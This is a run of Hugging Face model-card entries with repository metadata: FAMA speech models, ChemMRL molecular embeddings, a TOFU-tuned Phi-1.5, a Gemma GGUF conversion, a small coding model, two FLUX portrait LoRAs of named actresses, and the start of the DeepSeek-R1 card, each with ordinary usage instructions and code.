themself are [released under OS-compliant licenses](#license), promoting a more
responsible creation of models in our community.
It is available in 2 sizes, with 2 variants for ASR only:
- [FAMA-small](https://huggingface.co/FBK-MT/fama-small) - 475 million parameters
- [FAMA-medium](https://huggingface.co/FBK-MT/fama-medium) - 878 million parameters
- [FAMA-small-asr](https://huggingface.co/FBK-MT/fama-small-asr) - 475 million parameters
- [FAMA-medium-asr](https://huggingface.co/FBK-MT/fama-medium-asr) - 878 million parameters
For more information about FAMA, please check our [blog post](https://huggingface.co/blog/FAMA/release) and the [arXiv](https://arxiv.org/abs/2505.22759) preprint.
## Usage
FAMA models are supported in Hugging Face 🤗 Transformers.
To run the model, first install the Transformers and Datasets libraries.
```sh
pip install transformers==4.48.1 datasets
```
To perform a single inference on a sample audio file using the
[`pipeline`](https://huggingface.co/docs/transformers/main_classes/pipelines#transformers.AutomaticSpeechRecognitionPipeline)
class, run:
```python
import torch
from transformers import AutoProcessor, pipeline
from datasets import load_dataset
model_id = "FBK-MT/fama-medium"
processor = AutoProcessor.from_pretrained(model_id)
device = "cuda:0" if torch.cuda.is_available() else "cpu"
tgt_lang = "en"
# Force the model to start with the language tag
lang_tag = "<lang:{}>".format(tgt_lang)
lang_tag_id = processor.tokenizer.convert_tokens_to_ids(lang_tag)
generate_kwargs = {"num_beams": 5, "no_repeat_ngram_size": 5, "forced_bos_token_id": lang_tag_id}
pipe = pipeline(
"automatic-speech-recognition",
model=model_id,
trust_remote_code=True,
torch_dtype=torch.float32,
device=device,
return_timestamps=False,
generate_kwargs=generate_kwargs
)
dataset = load_dataset("distil-whisper/librispeech_asr_dummy", "clean", split="validation")
sample = dataset[0]["audio"]
result = pipe(sample)
print(result["text"])
```
Where `tgt_lang` is the target language (either `en` or `it`). The source languages has not to be specified.
To run the inference on a local audio file `audio.wav`, call the pipeline with:
```python
result = pipe("audio.wav")
```
To perform a batch inference with size `batch_size`, run:
```python
result = pipe(["audio_1.wav", "audio_2.wav"], batch_size=2)
```
For the inference, we suggest converting the audio files in wav format with 16kHz sampling rate and 1 channel.
## Results
We evaluate FAMA on ASR and ST tasks using popular open-source datasets such as CommonVoice, Multilingual LibriSpeech (MLS), VoxPopuli, CoVoST2 and FLEURS.
The metrics used are WER (↓) for ASR, and COMET (↑) for ST.
We also benchmark FAMA in terms of computational time and maximum batch size supported on HuggingFace against Whisper and SeamlessM4T models. The metric used is the inverse real time factor (xRTF).
**Key highlights:**
- FAMA achieves up to 4.2 WER and 0.152 COMET improvement on average across languages compared to OWSM v3.1
- FAMA is up to 8 times faster than Whisper large-v3 while achieving comparable ASR performance
### Automatic Speech Recogniton (ASR)
| ***Model/Dataset WER (↓)*** | **CommonVoice**-*en* | **CommonVoice**-*it* | **MLS**-*en* | **MLS**-*it* | **VoxPopuli**-*en* | **VoxPopuli**-*it* | **AVG**-*en* | **AVG**-*it* |
|-----------------------------------------|---------|---------|---------|---------|---------|----------|---------|----------|
| Whisper *medium* | 14.5 | 10.4 | 14.2 | 15.9 | 8.1 | 26.8 | 12.3 | 17.7 |
| Whisper *large-v3* | 11.2 | 6.5 | **5.0** | 8.8 | 7.1 | 18.8 | 7.8 | 11.4 |
| OWSM v3.1 *medium* | 11.9 | 12.5 | 6.6 | 19.3 | 8.4 | 24.0 | 9.0 | 18.6 |
| SeamlessM4T *medium* | 10.7 | 7.8 | 8.8 | 11.3 | 10.2 | 18.2 | 9.9 | 12.4 |
| SeamlessM4T *v2-large* | **7.7** | **5.0** | 6.4 | **8.5** | **6.9** | 16.6 | **7.0** | **10.0** |
| FAMA-ASR *small* | 13.8 | 8.9 | 5.8 | 12.6 | 7.2 | 15.7 | 8.9 | 12.4 |
| FAMA-ASR *medium* | 11.7 | 7.1 | 5.1 | 12.2 | 7.0 | 15.9 | 7.9 | 11.7 |
| FAMA *small* | 13.7 | 8.6 | 5.8 | 12.8 | 7.3 | **15.6** | 8.9 | 12.3 |
| FAMA *medium* | 11.5 | 7.0 | 5.2 | 13.9 | 7.2 | 15.9 | 8.0 | 12.3 |
### Speech Translation (ST)
| ***Model/Dataset WER (↓)*** | **CoVoST2**-*it→en* | **FLEURS**-*en→it* |
|-----------------------------------------|---------------------|--------------------|
| Whisper *medium* | 0.801 | - |
| Whisper *large-v3* | 0.825 | - |
| OWSM v3.1 *medium* | 0.636 | 0.337 |
| SeamlessM4T *medium* | 0.831 | 0.820 |
| SeamlessM4T *v2-large* | **0.852** | **0.855** |
| FAMA *small* | 0.774 | 0.807 |
| FAMA *medium* | 0.787 | 0.821 |
### Computational Time and Maximum Batch Size
| ***Model*** | ***Batch Size*** | ***xRTF en (↑)*** | ***xRTF it (↑)*** | ***xRTF AVG (↑)*** |
|------------------------|------------|-------------|-------------|--------------|
| Whisper *medium* | 8 | 13.3 | 10.9 | 12.1 |
| Whisper *large-v3* | 4 | 7.9 | 6.5 | 7.2 |
| SeamlessM4T *medium* | 2 | 28.5 | 26.2 | 27.4 |
| SeamlessM4T *v2-large* | 2 | 13.7 | 13.3 | 13.5 |
| FAMA *small* | 16 | **57.4** | **56.0** | **56.7** |
| FAMA *medium* | 8 | 39.5 | 41.2 | 40.4 |
## License
We release the FAMA model weights, and training data under the CC-BY 4.0 license.
The training data can be found in [FAMA Training Data](https://huggingface.co/datasets/FBK-MT/fama-data).
The [original FBK-fairseq codebase](https://github.com/hlt-mt/FBK-fairseq) used to train the model is released under the Apache 2.0 license.
## Citation
If you use FAMA in your work, please cite:
```
@misc{papi2025fama,
title={FAMA: The First Large-Scale Open-Science Speech Foundation Model for English and Italian},
author={Sara Papi and Marco Gaido and Luisa Bentivogli and Alessio Brutti and Mauro Cettolo and Roberto Gretter and Marco Matassoni and Mohamed Nabih and Matteo Negri},
year={2025}
}
``` |
Derify/ChemMRL-alpha | Derify | 2025-05-30T08:13:06Z | 215 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"roberta",
"smiles-similarity",
"feature-extraction",
"molecular-similarity",
"sentence-similarity",
"arxiv:2010.09885",
"arxiv:2209.01712",
"arxiv:2205.13147",
"arxiv:2402.14776",
"arxiv:1911.02855",
"arxiv:1908.10084",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] | sentence-similarity | 2025-05-27T01:32:43Z | ---
tags:
- sentence-transformers
- smiles-similarity
- feature-extraction
- molecular-similarity
pipeline_tag: sentence-similarity
library_name: sentence-transformers
metrics:
- accuracy
---
# Chem-MRL (SentenceTransformer)
This is a trained [Chem-MRL](https://github.com/emapco/chem-mrl) [sentence-transformers](https://www.SBERT.net) model. It maps SMILES to a 1024-dimensional dense vector space and can be used for semantic textual similarity, semantic search, database indexing, molecular classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
<!-- - **Base model:** [Unknown](https://huggingface.co/unknown) -->
- **Maximum Sequence Length:** 128 tokens
- **Output Dimensionality:** 1024 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Repository:** [Chem-MRL on GitHub](https://github.com/emapco/chem-mrl)
- **Demo App Repository:** [Chem-MRL-demo on GitHub](https://github.com/emapco/chem-mrl-demo)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 128, 'do_lower_case': False}) with Transformer model: RobertaModel (ChemBERTa)
(1): Pooling({'word_embedding_dimension': 1024, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("Derify/ChemMRL-alpha")
# Run inference
sentences = [
'CCO',
"CC(C)O",
'CC(=O)O',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 1024]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Framework Versions
- Python: 3.12.9
- Sentence Transformers: 4.0.1
- Transformers: 4.48.2
- PyTorch: 2.6.0+cu124
- Accelerate: 1.4.0
- Datasets: 3.3.2
- Tokenizers: 0.21.0
## Citation
- Chithrananda, Seyone, et al. "ChemBERTa: Large-Scale Self-Supervised Pretraining for Molecular Property Prediction." _arXiv [Cs.LG]_, 2020. [Link](http://arxiv.org/abs/2010.09885).
- Ahmad, Walid, et al. "ChemBERTa-2: Towards Chemical Foundation Models." _arXiv [Cs.LG]_, 2022. [Link](http://arxiv.org/abs/2209.01712).
- Kusupati, Aditya, et al. "Matryoshka Representation Learning." _arXiv [Cs.LG]_, 2022. [Link](https://arxiv.org/abs/2205.13147).
- Li, Xianming, et al. "2D Matryoshka Sentence Embeddings." _arXiv [Cs.CL]_, 2024. [Link](http://arxiv.org/abs/2402.14776).
- Bajusz, Dávid, et al. "Why is the Tanimoto Index an Appropriate Choice for Fingerprint-Based Similarity Calculations?" _J Cheminform_, 7, 20 (2015). [Link](https://doi.org/10.1186/s13321-015-0069-3).
- Li, Xiaoya, et al. "Dice Loss for Data-imbalanced NLP Tasks." _arXiv [Cs.CL]_, 2020. [Link](https://arxiv.org/abs/1911.02855)
- Reimers, Nils, and Gurevych, Iryna. "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks." _Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing_, 2019. [Link](https://arxiv.org/abs/1908.10084).
## Model Card Authors
[@eacortes](https://huggingface.co/eacortes)
## Model Card Contact
Manny Cortes ([email protected]) |
the-jb/phi-1_5-tofu_retain90 | the-jb | 2025-05-30T08:12:53Z | 130 | 0 | null | [
"safetensors",
"phi",
"dataset:locuslab/TOFU",
"base_model:microsoft/phi-1_5",
"base_model:finetune:microsoft/phi-1_5",
"license:mit",
"region:us"
] | null | 2025-04-15T13:05:31Z | ---
license: mit
datasets:
- locuslab/TOFU
base_model:
- microsoft/phi-1_5
---
## Model Summary
This model is a fine-tuned version of [microsoft/phi-1_5](https://huggingface.co/microsoft/phi-1_5) on the `retain90` split of the [locuslab/TOFU](https://huggingface.co/datasets/locuslab/TOFU) dataset, following the setup from [locuslab/tofu](https://github.com/locuslab/tofu).
This release includes the tokenizer files.
## License
This model is licensed under the [MIT License](https://opensource.org/licenses/MIT), inherited from the base model. |
gigipalsu/gemma-3-12b-it-Q4_K_M-GGUF | gigipalsu | 2025-05-30T08:12:42Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"llama-cpp",
"gguf-my-repo",
"image-text-to-text",
"base_model:unsloth/gemma-3-12b-it",
"base_model:quantized:unsloth/gemma-3-12b-it",
"license:gemma",
"endpoints_compatible",
"region:us",
"conversational"
] | image-text-to-text | 2025-05-30T08:11:52Z | ---
license: gemma
library_name: transformers
pipeline_tag: image-text-to-text
extra_gated_heading: Access Gemma on Hugging Face
extra_gated_prompt: To access Gemma on Hugging Face, you’re required to review and
agree to Google’s usage license. To do this, please ensure you’re logged in to Hugging
Face and click below. Requests are processed immediately.
extra_gated_button_content: Acknowledge license
base_model: unsloth/gemma-3-12b-it
tags:
- llama-cpp
- gguf-my-repo
---
# gigipalsu/gemma-3-12b-it-Q4_K_M-GGUF
This model was converted to GGUF format from [`unsloth/gemma-3-12b-it`](https://huggingface.co/unsloth/gemma-3-12b-it) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/unsloth/gemma-3-12b-it) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo gigipalsu/gemma-3-12b-it-Q4_K_M-GGUF --hf-file gemma-3-12b-it-q4_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo gigipalsu/gemma-3-12b-it-Q4_K_M-GGUF --hf-file gemma-3-12b-it-q4_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo gigipalsu/gemma-3-12b-it-Q4_K_M-GGUF --hf-file gemma-3-12b-it-q4_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo gigipalsu/gemma-3-12b-it-Q4_K_M-GGUF --hf-file gemma-3-12b-it-q4_k_m.gguf -c 2048
```
|
prithivMLmods/Wolf-Rayet-2B-Prime3 | prithivMLmods | 2025-05-30T08:11:05Z | 10 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"code",
"reinforcement-learning",
"math",
"conversational",
"en",
"arxiv:2309.00071",
"base_model:Qwen/Qwen3-1.7B",
"base_model:finetune:Qwen/Qwen3-1.7B",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-29T14:10:35Z | ---
library_name: transformers
tags:
- text-generation-inference
- code
- reinforcement-learning
- math
license: apache-2.0
language:
- en
base_model:
- Qwen/Qwen3-1.7B
pipeline_tag: text-generation
---

# **Wolf-Rayet-2B-Prime3**
> **Wolf-Rayet-2B-Prime3** is a compact, coding-optimized language model built on the **Qwen3 1.7B architecture**, fine-tuned for high-accuracy **code generation**, **debugging**, and **technical reasoning**. With approximately **2 billion effective parameters**, it offers a strong balance between performance and deployability—ideal for developers, educators, and engineers operating in resource-constrained or latency-sensitive environments.
> \[!note]
> GGUF: [https://huggingface.co/prithivMLmods/Wolf-Rayet-2B-Prime3-GGUF](https://huggingface.co/prithivMLmods/Wolf-Rayet-2B-Prime3-GGUF)
---
## **Key Features**
1. **Qwen3 Architecture Core**
Based on the modern and efficient **Qwen3 1.7B** transformer backbone, offering improved context handling and token efficiency for both single-turn and multi-turn programming tasks.
2. **Code-First Fine-Tuning**
Trained extensively on diverse code datasets including Python, JavaScript, C++, and Bash, with auxiliary tuning on software documentation, APIs, and debugging dialogues.
3. **Multi-Step Technical Reasoning**
Demonstrates the ability to deconstruct complex programming problems, explain logic, refactor code, and correct errors—particularly useful for students, engineers, and coding educators.
4. **Structured Output Proficiency**
Supports accurate generation of structured formats like JSON, YAML, Markdown, and code blocks—ready to plug into developer tools, notebooks, and documentation pipelines.
5. **Compact Yet Capable**
With a \~2B parameter scale, it delivers competitive performance without the high resource requirements of larger models, and is easily deployable on modern GPUs or high-end CPUs.
6. **Multilingual Coding Support**
Capable of generating and understanding code in 10+ programming languages, with a focus on real-world use cases, automation scripts, and algorithmic solutions.
---
## **Quickstart with Transformers**
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "prithivMLmods/Wolf-Rayet-2B-Prime3"
model = AutoModelForCausalLM.from_pretrained(
model_name,
torch_dtype="auto",
device_map="auto"
)
tokenizer = AutoTokenizer.from_pretrained(model_name)
prompt = "Write a Python function to check if a number is prime."
messages = [
{"role": "system", "content": "You are a helpful coding assistant."},
{"role": "user", "content": prompt}
]
text = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
model_inputs = tokenizer([text], return_tensors="pt").to(model.device)
generated_ids = model.generate(
**model_inputs,
max_new_tokens=512
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
print(response)
```
---
## **Intended Use**
* Code generation, refactoring, and cross-language translation
* Programming education and tutoring
* Technical documentation and boilerplate generation
* Debugging assistance and bug-fix suggestions
* Lightweight integration into IDEs, developer tools, and offline environments
---
## **Limitations**
* Context length is shorter than that of larger models (>7B)
* May require prompt engineering for complex or deeply nested code
* Limited general natural language conversation capabilities
* Not intended for creative writing or non-technical tasks
---
## **References**
1. [Qwen3 (1.7B) Model Overview](https://huggingface.co/Qwen/Qwen1.5-1.8B)
2. [YaRN: Efficient Context Window Extension of Large Language Models](https://arxiv.org/pdf/2309.00071) |
MSey/CA_paper_tiny_CALL_c511_r1_O1_f1_LT | MSey | 2025-05-30T08:06:46Z | 2 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-23T16:01:30Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Seanwang1221/Gaoyuanyuan_FLUX | Seanwang1221 | 2025-05-30T08:02:16Z | 16 | 0 | diffusers | [
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"region:us"
] | text-to-image | 2025-05-29T13:59:44Z | ---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- text: >-
GYY, a woman wearing a (plaid pencil_dress), holding a purse, floral
print, depth of field, night cityscape, 1girl, long hair,
ulzzang-6500v1.1, (original: 1.2), (realistic: 1.3) , beautiful girl with
beautiful details, extremely detailed eyes and face, eyes with beautiful
details, absurd, incredibly absurd, huge file size, ultra detail, high
resolution, ultra detailed, best quality, masterpiece, illustration, ultra
detailed and beautiful, ultra detailed, CG, unity, 8k wallpaper, amazing,
fine Detail, masterpiece, top quality, official art, extremely detailed CG
unity 8k wallpaper, cinematic lighting, (perfect shiny skin:0.6), slim and
smooth lines, (floating), (small breasts:1), earrings , pearl necklace
output:
url: images/Liblib_00455_.png
- text: >-
GYY, PH0383RG, In a captivating, high-definition close-up, the image
showcases a striking woman with black hair cascading down her shoulders, her
brown eyes sparkling with an intriguing gaze as they lock onto the viewer.
The camera is angled slightly from below, emphasizing her chiseled jawline
and full, luscious lips painted in a bold shade of red. She wears an
exquisite Victorian-inspired outfit, complete with a corseted bodice adorned
with intricate lace patterns and delicate pearls, and a long, flowing skirt
that billows softly around her legs. A dazzling array of jewels and
gemstones, including a large pendant necklace and a pair of matching
earrings, accentuate her regal beauty. The scene is set in a dimly lit,
opulent ballroom with grand chandeliers casting a warm, golden glow on the
woman's elegant figure. The emotional tone of the image is one of
confidence, allure, and an air of mystery that leaves the viewer captivated
and spellbound.
output:
url: images/Liblib_00460_.png
- text: >-
GYY, Nikon Z7 II and a NIKKOR Z 50mm f,1girl, 20yo,(wearing a red
cheongsam),(in london city),(RAW photo, best quality), (realistic,
photo-realistic), masterpiece, an extremely delicate and beautiful,
extremely detailed, 2k wallpaper, Amazing, finely detail, extremely detailed
CG unity 8k wallpaper, ultra-detailed, highres, soft light, beautiful
detailed girl, extremely detailed eyes and face, beautiful detailed nose,
beautiful detailed eyes,cinematic lighting,perfect anatomy,(slim body),hair
bun,(black hair),city lights at night,smiling
output:
url: images/Liblib_00470_.png
- text: >-
GYY, An upper body image of a beautiful young lady, wavy hair, bright brown
eyes, and bold eyeliner. She has fake nails, and her lips are shiny and
full. She wears helix piercing. The extreme realism focuses on her detailed
skin, showing fine textures and natural highlights. The background is open
area with Families flying kites in open city, Small groups of people playing
instruments in parks Her outfit are Loose-fitting kaftan dress with
intricate patterns and earthy tones Subtle skin pores and natural texture
on the face and neck, Realistic light reflections on the surface of the
eyes, Slightly raised veins visible under the skin on the neck, Subtle veins
visible on the eyelids under certain lighting, Realistic reflection of light
on the glossy lips, following their curvature, Soft reflections on the
necklace, enhancing its metallic look, Soft shadows under the lower lip,
enhancing depth and form, slight noise effect to add texture and realism to
the image.a slight sheen of sweat or natural skin oil to areas like the
forehead and nose.Apply subsurface scattering to the skin to simulate the
way light penetrates and scatters within it, enhancing realism. taking a
selfie, holding her hand out and smiling cheerfully, her lips open revealing
her beautiful teeth and tongue
output:
url: images/Liblib_00477_.png
base_model: black-forest-labs/FLUX.1-dev
instance_prompt: GYY
---
# Gao Yuanyuan 高圆圆 Flux
<Gallery />
## Model description
https://cdn-uploads.huggingface.co/production/uploads/66dc28e2928613d3397f0bf8/OV3DPWvDqXFIqjcFxNqAl.mp4
## Trigger words
You should use `GYY` to trigger the image generation.
## Download model
Weights for this model are available in Safetensors format.
[Download](/Seanwang1221/Gaoyuanyuan_FLUX1/tree/main) them in the Files & versions tab.
|
Seanwang1221/Wangluodan_FLUX | Seanwang1221 | 2025-05-30T08:00:25Z | 0 | 0 | diffusers | [
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"region:us"
] | text-to-image | 2025-05-30T07:59:44Z | ---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- text: >-
WLD, In a gritty, noir-inspired scene set against the backdrop of a dimly
lit, rain-soaked neon-lit street in 1940s New York City, a mysterious woman
with cascading chestnut locks adorned with antique pearl earrings and a
striking silver pendant necklace, stands tall with her back against the
brick wall of an abandoned building. Her parted lips are slightly pursed as
she gazes directly at the viewer with piercing emerald eyes, her teeth
glinting in the intermittent neon glow reflecting off the wet pavement
beneath her. The camera is positioned low and angled upwards, capturing a
close-up of her enigmatic expression and the intricate details of her
vintage fur coat and trench dress, creating an intense emotional tone of
allure and danger that hints at secrets yet to be revealed.
output:
url: images/Liblib_01179_.png
- text: >-
WLD, In a dimly lit, vintage-inspired boudoir, the captivating WLD is poised
against a velvet-draped chaise lounge, her cascading raven tresses framing a
radiant smile that lights up the room. Her eyes twinkle with an enchanting
allure as they gaze into the distance, a pair of exquisite emerald earrings
adorning her lobes. A smoky-eye makeup look and bold red lipstick accentuate
her stunning features. Her fingers playfully trace the edge of a worn,
feather-trimmed pillow, her delicate hand adorned with intricate gold
bracelets. The camera captures this intimate moment from a low angle,
focusing on her expressive eyes and the subtle glow emanating from within,
creating an ethereal and dreamy atmosphere that speaks volumes about her
innate grace and charisma.
output:
url: images/Liblib_01198_.png
- text: >-
WLD, In a captivating, ethereal scene reminiscent of a Renaissance painting,
the camera angles from below, capturing a close-up view. A woman with an
ageless beauty adorned in a whimsical, Victorian-inspired gown with
intricate lacework and pastel hues stands against the backdrop of a sunlit
meadow, her long, cascading chestnut curls framing her delicate features.
Her eyes, filled with warmth and curiosity, are locked onto the viewer's
gaze as she subtly smiles, emanating an enchanting charm that transcends
time. The soft, golden sunlight filters through dappled leaves overhead,
casting a warm, radiant glow on her face, creating a vivid, dreamlike
atmosphere that exudes tranquility and love.
output:
url: images/Liblib_01200_.png
- text: >-
WLD, In a dimly lit, ethereal forest clearing bathed in moonlight, a
striking brown hair woman with a closed-mouth smile, stands poised and
confident. She is adorned in an intricately designed white shirt that
shimmers under the moonbeams, revealing delicate jewelry and a unique
pendant necklace around her neck. The camera captures a close-up of her
face, focusing on her captivating black eyes that seem to sparkle like the
stars above. Her short hair cascades down her back in soft, creating an air
of mystique as she gazes off into the distance, surrounded by a halo of
moonlight and the rustling leaves of ancient trees. The emotional tone
evokes a sense of serenity and enchantment within the dense, magical forest
setting.
output:
url: images/Liblib_01205_.png
base_model: black-forest-labs/FLUX.1-dev
instance_prompt: WLD
---
# Wang Luodan 王珞丹 Flux
<Gallery />
## Trigger words
You should use `WLD` to trigger the image generation.
## Download model
Weights for this model are available in Safetensors format.
[Download](/Seanwang1221/Wangluodan_FLUX/tree/main) them in the Files & versions tab.
|
Jackmin108/qwen-7b-rl-step-1 | Jackmin108 | 2025-05-30T07:57:48Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:2501.12948",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T05:03:06Z | ---
license: mit
library_name: transformers
---
# DeepSeek-R1
<!-- markdownlint-disable first-line-h1 -->
<!-- markdownlint-disable html -->
<!-- markdownlint-disable no-duplicate-header -->
<div align="center">
<img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" />
</div>
<hr>
<div align="center" style="line-height: 1;">
<a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;">
<img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/>
</a>
<a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;">
<img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/>
</a>
<a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;">
<img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/>
</a>
</div>
<div align="center" style="line-height: 1;">
<a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;">
<img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/>
</a>
